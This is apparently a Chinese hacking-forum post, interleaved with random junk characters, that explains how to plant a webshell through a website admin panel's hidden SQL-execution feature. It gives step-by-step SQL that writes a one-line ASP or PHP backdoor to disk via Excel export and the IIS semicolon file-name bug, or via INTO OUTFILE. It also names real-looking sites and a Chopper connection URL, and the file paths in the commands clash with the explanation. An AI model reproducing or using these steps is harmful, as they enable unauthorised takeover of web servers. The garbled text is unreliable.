好不容易进了后台,发现啥上传啊。备份啊多木有。
/ l6 a$ a v$ D7 {2 hwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的. e" H4 c) x2 d/ B1 @
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
; [% A& ^. ?/ n% [) p然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:: N- S2 T0 ~! |. x
1.create table cmd (a varchar(50))( G# p' z( E+ O" G; @/ H
2.insert into cmd (a) values (‘‘)
3 ~/ |) H3 i' e% R$ L3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd$ v# A: h5 s8 k7 Z3 k1 }8 w9 d
(把表cmd的内容导出为物理路径的一个EXCEL文件)( h! Y5 J* v0 @) D
4.drop table cmd
8 d. R" i x" J, {利用IIS的BUG成功拿到了WEBSHELL。3 X1 n' ]2 s! `& L3 p7 \
" O, Q6 W @4 v4 g W* I1 ?6 ?6 \4 d直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
6 u9 `% R( c+ r6 m1 D4 ~" Y6 a% d+ f0 }( s
SQL语句意思解释:
6 a( r/ }! T) Q% ?3 { 第一句* O5 M0 e2 c0 G
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为507 _2 i1 A' ?7 M7 @, {
2 C* O6 k; ^, ~* @2 _+ e! N
第二句
9 R( p$ T# J4 R; s3 m$ w* U 在表cmd的a字段插入一句话木马, j* V* N% t0 h' l2 j. ]9 k" H1 n
第三句
" u% z( _7 K( t% o 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件9 h% ?; s7 b( F3 }: y& @+ @
v7 ?, s$ f& g- \0 q D 第四句
* V8 c9 n5 r8 c4 m2 w5 X7 v; X 删除建立的cmd表
& d3 a ?( ~' L. D0 \
, C2 ^; Z3 f3 x( N8 z( B 以下内容为测试:2 V7 O. z( ?% |" N) K1 i+ w
Access利用后台SQL执行命令功能导出WebShell:
# v1 x) R3 ]+ g 这个更简单:* W2 y+ `) N6 a4 T$ v) E+ s0 [& Q
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]( K; O& ?0 K! x$ T, n
或者
2 X% o# ~) M# g! m) d& Z/ m3 @$ F B [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
: @* }. Z6 j$ h$ } I" l9 o& `% L. B) A# y$ K
后台有执行SQL语句功能(vote为已知表段)* E. t+ _( D/ L8 x
希望对大家有所帮助拿shell的又一个思路
5 k6 t! N6 H' J! ?9 S2 ?& b |